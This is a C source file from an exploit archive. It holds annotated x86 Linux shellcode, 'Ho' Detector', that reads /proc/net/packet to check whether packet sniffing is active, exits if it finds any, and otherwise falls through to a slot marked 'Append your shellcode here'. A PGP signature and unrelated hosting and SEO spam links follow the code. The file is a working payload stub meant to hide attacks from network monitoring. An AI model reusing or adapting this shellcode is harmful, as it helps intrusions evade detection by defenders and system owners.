/*
âââ â âââ . â â â â â ·. ââ ââ âââââ âââ·
âââââ ââ.â· âââââ â ·ââ âââââ ââ âââ âââ ââ ââ
·ââ· ââââ â âââââ ââââ ââ âââââ· âââââ ââ.â âââââ
â ââ·ââ âââââ âââââ âââ.ââ ââ ââââââ âââââ âââ· ââ â ââ
âââ ââ âââ ââ ââ âââââ ââ ââ âââ âââ âââ â â
Ho' Detector (Promiscuous mode detector shellcode)
by XenoMuta <xenomuta[at]phreaker[dot]net>
http://xenomuta.tuxfamily.org/
This shellcode uses a stupid, yet effective method
for detecting sniffing on all interfaces in linux:
parsing /proc/net/packet, which contains libpcap's
stats and only one line (56 bytes) when not sniffing.
*/
char sc[]=
"\x66\x31\xC0" // xor eax,eax
"\x66\x50" // push eax
"\x66\x68\x63\x6B\x65\x74" // push dword 0x74656b63 ; cket
"\x66\x68\x74\x2F\x70\x61" // push dword 0x61702f74 ; t/pa
"\x66\x68\x63\x2F\x6E\x65" // push dword 0x656e2f63 ; c/ne
"\x66\x68\x2F\x70\x72\x6F" // push dword 0x6f72702f ; /pro
"\xB0\x05" // mov al,0x5 ; open()
"\x66\x89\xE3" // mov ebx,esp ; /proc/net/packet
"\x66\x31\xC9" // xor ecx,ecx ; O_RDONLY
"\xCD\x80" // int 0x80
"\x66\x93" // xchg eax,ebx
"\x6A\x03" // push byte +0x3 ; read()
"\x66\x58" // pop eax
"\x66\x89\xE1" // mov ecx,esp
"\x6A\x39" // push byte +0x39 ; at most 57 bytes
"\x66\x5A" // pop edx
"\xCD\x80" // int 0x80
"\x3C\x38" // cmp al,0x38 ; if only 56 bytes
"\x74\x06" // jz 0x40 ; there is no packet
"\x6A\x01" // push byte +0x1 ; capture. Proceed
"\x66\x58" // pop eax ; with shellcode
"\xCD\x80" // int 0x80 ; else, exit()
/*
Append your shellcode here
*/
"\x90";
main(){(*(void (*)()) sc)();}
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s
opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp
=ISTU
-----END PGP SIGNATURE-----
// milw0rm.xmc.pl 8x16*32^n
Polish:
Webdeveloper |
Probably the best hosting company Interserver
SEO Shop:
Multi-quality SEO links |
Best Proxy Service.
Group: xmc.pl